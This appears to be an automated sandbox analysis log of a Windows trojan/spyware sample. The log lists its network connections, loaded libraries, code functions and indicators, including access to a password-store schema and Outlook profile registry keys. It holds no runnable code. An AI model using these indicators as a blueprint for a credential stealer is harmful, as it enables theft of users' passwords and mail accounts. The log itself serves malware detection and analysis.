            Source: 6mGpn6kupm.exe, 00000005.00000003.1781945839.00000000047E4000.00000004.00000020.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000003.1818339391.000000000479D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comO
            Source: 6mGpn6kupm.exe, 00000005.00000003.1781945839.00000000047E4000.00000004.00000020.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000003.1818339391.000000000479D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comOO
            Source: 6mGpn6kupm.exe, 00000005.00000003.1781869724.00000000047A6000.00000004.00000020.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000003.1781986956.00000000047A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 6mGpn6kupm.exe, 00000005.00000003.1781869724.00000000047A6000.00000004.00000020.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000003.1781986956.00000000047A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.2.10:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.10:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49978 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49984 version: TLS 1.2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_701C1B5F0_2_701C1B5F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_3_0019505D5_3_0019505D
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00404DCC5_2_00404DCC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00406AF25_2_00406AF2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_001543285_2_00154328
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00158DA05_2_00158DA0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_001559685_2_00155968
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00155F905_2_00155F90
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00152DD15_2_00152DD1
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CACCA05_2_34CACCA0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA2D685_2_34CA2D68
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA553F5_2_34CA553F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAF64B5_2_34CAF64B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA76285_2_34CA7628
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAC6385_2_34CAC638
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA2A205_2_34CA2A20
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA03C45_2_34CA03C4
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA331B5_2_34CA331B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAB4EC5_2_34CAB4EC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CACC915_2_34CACC91
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CABD885_2_34CABD88
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CADEE15_2_34CADEE1
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA6E915_2_34CA6E91
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA6EA05_2_34CA6EA0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAE7905_2_34CAE790
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA7F095_2_34CA7F09
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA78485_2_34CA7848
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAF0435_2_34CAF043
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAB07F5_2_34CAB07F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAC1F25_2_34CAC1F2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAB9445_2_34CAB944
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAAAEB5_2_34CAAAEB
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CADA895_2_34CADA89
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAEBF75_2_34CAEBF7
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA6B875_2_34CA6B87
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CAE3395_2_34CAE339
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A896C85_2_37A896C8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A886505_2_37A88650
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8BDF05_2_37A8BDF0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A89D105_2_37A89D10
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8A3605_2_37A8A360
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8BA975_2_37A8BA97
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8A9B05_2_37A8A9B0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A818585_2_37A81858
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A80FA85_2_37A80FA8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A867BC5_2_37A867BC
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8AFF85_2_37A8AFF8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8AFF75_2_37A8AFF7
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A867C05_2_37A867C0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A85F105_2_37A85F10
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A83F605_2_37A83F60
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A83F705_2_37A83F70
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A896B85_2_37A896B8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A836B05_2_37A836B0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A836C05_2_37A836C0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A82E105_2_37A82E10
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A856605_2_37A85660
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8565C5_2_37A8565C
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A886525_2_37A88652
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A84DB05_2_37A84DB0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A84DB25_2_37A84DB2
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8BDE15_2_37A8BDE1
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A89D005_2_37A89D00
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A825605_2_37A82560
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A825505_2_37A82550
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A81CA05_2_37A81CA0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A81CB05_2_37A81CB0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A874C85_2_37A874C8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A814005_2_37A81400
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A86C185_2_37A86C18
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A843B95_2_37A843B9
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A813F05_2_37A813F0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A843C85_2_37A843C8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A83B085_2_37A83B08
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A83B185_2_37A83B18
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A863685_2_37A86368
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A87B625_2_37A87B62
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8A3585_2_37A8A358
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A85AB85_2_37A85AB8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A852085_2_37A85208
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A852075_2_37A85207
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A832685_2_37A83268
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A829A85_2_37A829A8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8A9A05_2_37A8A9A0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A829B85_2_37A829B8
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8F1205_2_37A8F120
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A8F1305_2_37A8F130
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A821085_2_37A82108
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A848205_2_37A84820
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A870705_2_37A87070
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37A800405_2_37A80040
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37FBE7905_2_37FBE790
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37FBD6085_2_37FBD608
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37FBC6B05_2_37FBC6B0
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_37FB83285_2_37FB8328
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: String function: 00402C41 appears 49 times
            Source: 6mGpn6kupm.exe, 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6mGpn6kupm.exe
            Source: 6mGpn6kupm.exe, 00000005.00000002.2541418618.000000000478E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6mGpn6kupm.exe
            Source: 6mGpn6kupm.exe, 00000005.00000002.2567603799.0000000034B87000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 6mGpn6kupm.exe
            Source: 6mGpn6kupm.exe, 00000005.00000000.1709625341.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6mGpn6kupm.exe
            Source: 6mGpn6kupm.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6mGpn6kupm.exe
            Source: 6mGpn6kupm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeMutant created: NULL
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeFile created: C:\Users\user\AppData\Local\Temp\nseBEA8.tmpJump to behavior
            Source: 6mGpn6kupm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 6mGpn6kupm.exe, 00000005.00000002.2568386799.0000000034E77000.00000004.00000800.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000002.2568386799.0000000034E63000.00000004.00000800.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000002.2568386799.0000000034E55000.00000004.00000800.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000002.2568386799.0000000034E45000.00000004.00000800.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000002.2568386799.0000000034E84000.00000004.00000800.00020000.00000000.sdmp, 6mGpn6kupm.exe, 00000005.00000002.2570255564.0000000035D8D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 6mGpn6kupm.exeReversingLabs: Detection: 57%
            Source: 6mGpn6kupm.exeVirustotal: Detection: 76%
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeFile read: C:\Users\user\Desktop\6mGpn6kupm.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\6mGpn6kupm.exe "C:\Users\user\Desktop\6mGpn6kupm.exe"
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess created: C:\Users\user\Desktop\6mGpn6kupm.exe "C:\Users\user\Desktop\6mGpn6kupm.exe"
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess created: C:\Users\user\Desktop\6mGpn6kupm.exe "C:\Users\user\Desktop\6mGpn6kupm.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
